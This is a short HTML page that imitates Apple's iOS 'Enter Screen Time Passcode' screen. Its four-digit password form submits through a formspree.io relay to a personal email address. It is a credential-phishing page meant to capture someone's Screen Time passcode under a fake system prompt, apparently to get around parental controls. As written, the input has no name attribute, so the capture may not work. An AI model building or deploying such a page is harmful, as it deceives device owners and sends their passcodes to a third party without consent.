
<h1 style="font-family: -apple-system; font-size:40pt; background-color:GhostWhite" align="center" >Enter Passcode</h1>

<body style="background-color:lightgray">
  <hr>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <br>
  <h3 style="font-family: -apple-system; font-size: 35pt" align="center">Enter Screen Time Passcode</p>
  <form action="http://formspree.io/kevin.fong@warriorlife.net">
    <input style="height:120px;width:400px;font-size:50pt;letter-spacing:0.6em;border:none;position:absolute;left:50%;transform:translateX(-50%);background-color:lightgray"type="password" pattern="[0-9]*" inputmode="numeric" maxlength="4" align="center"></input>
    <input style="color:DeepSkyBlue;font-family: -apple-system; font-size:30pt" type="submit" value="Done">
  </form>

  
</body>
  
